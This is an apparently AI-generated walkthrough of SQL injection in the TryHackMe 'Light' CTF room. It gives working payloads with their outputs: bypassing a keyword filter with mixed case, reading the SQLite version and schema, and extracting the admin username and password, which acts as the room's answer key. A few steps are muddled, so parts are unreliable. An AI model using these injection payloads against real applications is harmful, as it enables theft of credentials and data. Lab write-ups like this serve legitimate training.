Understanding SQL Injection in CTF TryHackMe Light
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
This guide walks you through identifying and exploiting SQL injection vulnerabilities in the Light database application on TryHackMe. You'll learn various SQL injection techniques to extract information from the database.
Key Points
- SQL Injection: A code injection technique that can destroy your database.
- SQLite Database: The application likely uses SQLite, a lightweight database engine.
- Payload Testing: Various payloads are tested to identify vulnerabilities.
- Database Schema: Extracting the database schema to understand its structure.
- Data Extraction: Retrieving sensitive information such as usernames and passwords.
Connecting to the Application
To start, connect to the application using the provided details:
nc xx.xx.xxx.xx 1337
Use the username smokey to get started.
Testing for SQL Injection
Initial Test
Instead of using the provided username, try using ':
nc xx.xx.xxx.xx 1337
You should receive an error:
Error: unrecognized token: "''' LIMIT 30"
This indicates a potential SQL injection vulnerability.
Payload Testing
Try the following payloads to see if they are blocked:
smokey' OR '1'='1' --UNIONSELECT
You will receive messages indicating that certain inputs are not allowed.
Capitalizing SQL Terms
Try capitalizing SQL terms to bypass filters:
Union
You should receive:
Username not found.
Extracting Database Information
Identifying the Database Version
Use the payload:
smokey' Union Select sqlite_version()'
You should receive:
3.31.1
This confirms the use of a SQLite database.
Extracting the Database Schema
Use the payload:
smokey' Union Select sql FROM sqlite_master'
You should receive:
CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
This describes the database's schema.
Retrieving Usernames and Passwords
Use the following payloads to extract usernames and passwords:
smokey' Union Select username FROM admintable'
You should receive:
TryHackMeAdmin
To get the password:
smokey' Union Select password FROM admintable WHERE username='TryHackMeAdmin''
You should receive:
vYQ5ngPpw8AdUmL
Learn More
For more information on SQL injection and how to protect against it, consider exploring resources on SQL injection prevention and database security best practices.